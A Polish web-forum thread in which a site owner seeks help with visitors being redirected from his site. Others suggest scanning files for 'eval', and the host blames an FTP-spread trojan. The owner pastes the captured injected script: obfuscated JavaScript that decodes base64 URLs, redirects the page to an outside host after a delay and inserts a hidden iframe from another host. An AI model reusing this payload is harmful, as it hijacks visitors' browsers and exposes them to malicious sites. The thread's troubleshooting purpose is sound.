Wirus(?) przekierowanie na stronie

[ar4]

U mnie na win 8 kaspersky pure 3 zablokował adres, a więc masz w dalszym ciągu problem...

[admin]

Ostatnio miałem podobnie. Nie mogłem znaleźć "podjerzanego" pliku. Znalazłem go przypadkiem, analizując kod wczytywanych plików.

Okazało się, że data modyfikacji była niezmieniona (z 2010 roku, z dnia kiedy wgrywałem pliki na serwer) i to mnie zmyliło...

Radzę więc przejrzeć pliki dokładnie, szczególnie te z "head", "foot", "index" w nazwie.

[Trotyl]

Czyli, dobrze rozumiem, problem jest po stronie serwera?

Może tak być. Najszybciej to sprawdzisz wrzucając testowo stronę na inny serwer. To coś zapisuje sobie nowe IP i przekierowuje dwa pierwsze żądania. IP zapisuje w pliku lub bazie danych. Więc możesz tym tropem to odnaleźć, po dacie modyfikacji. To dedyk?

Jeżeli chodzi o pliki PHP, to poszukaj w nich słów "header" i "eval" i zobacz czy tam nie ma złośliwego kodu.

[sz3lo]

To nie jest dedyk, tylko zwykły hosting w mzone.

Mimo że usunałem wszystko i wgrałem czyste pliki to zdaje się dalej występuje, użytkownik wysłał mi kod jaki to generuje przy przekierowaniu:

<html><head><title>index</title></head><body><script>

function b64dc(str) {
var b64c = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg'+'hijklmnopqrstuvwxyz0123456789+/=';
var b64d = '', chr1, chr2, chr3, enc1, enc2, enc3, enc4;
str = str.replace(/[^a-z0-9+/=]/gi, '');
for (var i=0; i<str.length;) {
enc1 = b64c.indexOf(str.charAt(i++));
enc2 = b64c.indexOf(str.charAt(i++));
enc3 = b64c.indexOf(str.charAt(i++));
enc4 = b64c.indexOf(str.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
b64d = b64d + String.fromCharCode(chr1);
if (enc3 < 64) { b64d += String.fromCharCode(chr2); }
if (enc4 < 64) { b64d += String.fromCharCode(chr3); }
}
return b64d;
};

function gotime() { xflag=false; if (typeof(location.replace)!='undefined') { top.location.replace( b64dc("aHR0cDovLzFwMXhxOWE4ajltenYxM
XM0dWcxeWk3LmFuYWxhY2NvdW50cy5jb20vYWRzb3J0LnBocD95eT0xJmFpZD0yJmF0cj1leHRzJnNyYz0xODQ=") ); } else
{ top.location.href = b64dc("aHR0cDovLzFwMXhxOWE4ajltenYxMXM0dWcxeWk3LmFuYWxhY2NvdW50cy5jb20vYWRzb3J0LnBocD95eT0xJmFpZD0yJmF0cj1leHRzJnNyYz0xODQ="); }; }; var timer=setTimeout("gotime()", 21000);
var msdeo;
msdeo=document.createElement("span");
msdeo.innerHTML=b64dc("PGlmcmFtZSBzcmM9Imh0dHA6Ly9hZW11ZmVpZi5zaGVldGhvby5jb206ODAwMC9hcmx3ZWxqP2VlcG9xY3JmZj0zODk2MTc2IiB3aWR0aD0iMTIwIiAgaGVpZ2h0PSIyMSIgbWFyZ2lud2lkdGg9IjAiIG1hcm
dpbmhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiICBzY3JvbGxpbmc9Im5vIiBhbGxvd3RyYW5zcGFyZW5jeT0idHJ1ZSI+PC9pZnJhbWU+PGJyPg==");
setTimeout(function() { document.body.insertBefore(msdeo,document.body.lastChild); }, 781);
</script></body></html>

Masakra, czwarty dzień nad tym siedze i nic...

Nie widze żadnych nietypowych plików, katalogów - nic nowego po dacie modyfikacji wcześniej nie znalazłem. Przejrzałem też chyba wszystkie pliki, które są używane przy generowaniu tej strony, żadnych podejrzanych kodów... Chyba pozostaje tylko opcja ze zmianą hosta, bo nie wiem już co robić.

[unnamed]

Dziwne to masz. Kliknąłem na link ze stopki i przekierowało na "adultfriendfinder. com" , ale jak kliknąłem 2 raz to juz normalnie się stronka załadowała i przy kolejnych próbach wszystko działa jak należy

[ar4]

Dziwna sprawa... przekierowanie jest na adres: https:/www.ask.com/web?q=puppies

[Gość]

Postaw strone na innym hostingu i sprawdz czy problem nadal wystepuje.

[SzlafRock]

To nie jest wina hostingu (raczej) a dziurawych skryptów.

[mzone]

Dwie osoby z tego serwera zgłosiły bardzo podobny problem, serwer jest systemtycznie skanowany i problem nie występuje na innych kontach klientów np o stronach o innej tematyce.

Co ciekawe oboje klienci posiadają strony o takiej samej tematyce(nie będę pisał o jaką tematykę chodzi, jest to bardzo popularna tematyka zarobkowej strony ostatnio, więc trojan może się dostać w zasadzie nawet przy aktualizacji strony poprzez FTP).

Trojan często jest zreplikowany poprzez użycie np aplikacji Total Commander: https://www.f-secure....inowal_cp.shtml

Konta przenieśliśmy na inny serwer dla bezpieczeństwa, jeśli jednak są to dziurawe plugin nic nie będziemy mogli tutaj pomóc i problem prawdopodobnie nie zniknie.

Trojan ukryty w skrypcie może się aktywować tylko w niektórych okolicznościach, wtedy będzie bardzo trudno go wykryć na danym koncie.

Tu proponowałbym reinstalację całego serwera i wgranie czystej kopii od nowa. Zmiana haseł może tutaj wcale nie pomóc.